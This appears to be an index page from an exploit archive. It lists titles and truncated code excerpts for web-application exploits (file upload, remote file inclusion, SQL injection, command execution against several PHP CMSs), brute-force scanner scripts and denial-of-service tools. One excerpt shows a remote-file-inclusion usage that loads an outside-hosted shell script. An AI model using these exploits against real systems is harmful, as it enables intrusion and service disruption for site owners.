imacs CMS 0.3.0 Shell Upload

?php / ,--^----------,--------,-----,-------^--, | ||||||||| --------' | O .. CWH Underground Hacking Team .. +---------------------------^----------| ,-------, | / XXXXXX /| / / XXXXXX / \ / / XXXXXX /\ / XXXXXX / / XXXXXX / ------' Exploit Title : imacs CMS Unrestricted File Upload Exploit Date...

pcanywhere-brute NSE Script

Performs brute force password auditing against the pcAnywhere remote access protocol. Due to certain limitations of the protocol, bruteforcing is limited to single thread at a time. After a valid login pair is guessed the script waits some time until server becomes available again. Script Argumen...

WordPress Zingiri 2.2.3 Code Execution

get; 41. ifremoveTrailingSlash$sessionAction-getFolder == getParentPath$POST'id' && sizeof$selectedDocuments 42. 43. if$key = arraysearchbasename$POST'id', $selectedDocuments !== false 44. 45. $selectedDocuments$key = $POST'value'; 46. $sessionAction-set$selectedDocuments; 47. 48. 49. echo...

rexec-brute NSE Script

Performs brute force password auditing against the classic UNIX rexec remote exec service. Script Arguments rexec-brute.timeout socket timeout for connecting to rexec default 10s passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb See the documentation for the unpwdb library...

rlogin-brute NSE Script

Performs brute force password auditing against the classic UNIX rlogin remote login service. This script must be run in privileged mode on UNIX because it must bind to a low source port number. Script Arguments rlogin-brute.timeout socket timeout for connecting to rlogin default 10s passdb,...

PHP iCalendar 2.24 - cookie_language Local File Inclusion Arbitrary File Upload

PHP iCalendar 2.24 - cookielanguage Local File Inclusion Arbitrary File Upload '.$lang'lcalfile'.' '.$filenumber.': '.$lang'lactionsuccess'.''; 84. el...

runcms-overwrite.txt

RunCmss Bug Yahoo! Crawler body font-size: 10px; font-family: verdana; INPUT BORDER-TOP-WIDTH: 1px; FONT-WEIGHT: bold; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 10px; BORDER-LEFT-COLOR: D50428; BACKGROUND: 590009; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: D50428; COLOR: 00ff00; BORDER-TOP-COLOR:...

Wireshark 0.99.5 - DNP3 Dissector Infinite Loop

Wireshark 0.99.5 - DNP3 Dissector Infinite Loop !/usr/bin/perl Automatically generated by beSTORMtm Copyright Beyond Security c 2003-2007 $Revision: 3741 $ Attack vector: M0:P0:B0.BT0:B0.BT0:B0.BT0:B0.BT0 Module: DNP3 use strict; use warnings; use Getopt::Std; use IO::Socket::INET; $SIGINT = \ my...

phpDVD v1.0.4 (dvd_config_file) Remote File Include Exploit

!/usr/bin/php -q -d shortopentag=on ? print ' //'=============================================================================================== //'Script : phpDVD v1.0.4 //'Author : iLker Kandemir ilkerkandemiratmynet.com //'S.Page : http://ugo.scarlata.it/phpdvd/phpDVD-1.0.4.tar.gz //'Dork :...

mycms-exec.txt

!/usr/bin/php -q -d shortopentag=on Thanks to rgod for the php code and Marty for the Love "; if $argcNo new score set"; elseif $score $data $file1 = "snakescore.txt"; $file2 = "snakesetby.txt"; $file1h = fopen$file1, 'w' or die"can't open file"; $file2h = fopen$file2, 'w' or die"can't open file"...

mxBB Module FAQ & RULES 2.0.0 - Remote File Inclusion

!/usr/bin/php -q -d shortopentag=on cmd: a shell command ls -la Options: -pport: specify a port other than 80 -Pip:port: specify a proxy Example: php '.$argv0.' localhost http://www.shellsite.com/shell.txt ls -la -P1.1.1.1:80 shell.txt:...

rps62-sql.txt

? //RPS 6.2 SQL Injection Exploit //http://www.rps-project.com/ //Need magicquotesgpc = Off; //by s0cratex //Contact: s0cratexathotmaildotcom //Salu2: rgod, 0pt1x 'n mechas. errorreporting0; iniset"maxexecutiontime",0; iniset"defaultsockettimeout",5; $host = "localhost"; $path="/rps"; $id=1; echo...

WebText 0.4.5.2 - Remote Code Execution

WebText 0.4.5.2 - Remote Code Execution DEVIL TEAM IRC: irc.milw0rm.com:6667 devilteam http://www.rahim.webd.pl/ ======== Contact: [email protected] cod3d by Kacper -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=...

YapBB <= 1.2 Beta2 (yapbb_session.php) Remote File Include Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? print ' ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+: :+:...

PHP-Proxima 6.0 - 'BB_Smilies.php' Local File Inclusion

source: https://www.securityfocus.com/bid/19840/info PHP-Proxima is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to retrieve arbitrary local files from the vulnerable system in the context of the...

XMB 1.9.6 Final - 'basename()' Remote Command Execution

!/usr/bin/php -q -d shortopentag=on ? echo "XMB = 1.9.6 Final basename 'langfilenew' arbitrary local inclusion / remote commands xctn\n"; echo "by rgod [email protected]\n"; echo "site: http://retrogod.altervista.org\n"; echo "dork: "Powered by XMB"\n\n"; / works regardless of php.ini settings /...

FCKEditor 2.0 2.2 - FileManager connector.php Arbitrary File Upload

FCKEditor 2.0 2.2 - FileManager connector.php Arbitrary File Upload a short explaination: if a user cam call directly http://target/path/editor/filemanager/browser/default/connectors/php/connector.php he can upload malicious contempt on a target server, including arbitrary php code, and launch...

CuteNews <= 1.4.1 (shell inject) Remote Command Execution Exploit

Exploit for unknown platform in category web applications ================================================================= CuteNews CuteNews 1.4.1 re...

PHP-Nuke 7.8 - SQL Injection / Remote Command Execution

?php 20.05 23/10/2005 ---phpnuke78xpl.php PHPNuke 7.8 with all security fixes/patches "Downloads","WebLinks" & "YourAccount" modules SQL Injection / remote commands execution exploit yet not tested 7.9, but OK... by rgod site: http://rgod.altervista.org make these changes in php.ini if you have...

Painkiller 1.3.1 - Denial of Service

/ by Luigi Auriemma / include include include ifdef WIN32 include include "winerr.h" define close closesocket else include include include include include endif define VER "0.1" define BUFFSZ 2048 define PORT 3455 define TIMEOUT 3 define GAMEVER "1.3" define INFO "xfexfdx00xDExADxC0xDExffxffxff"...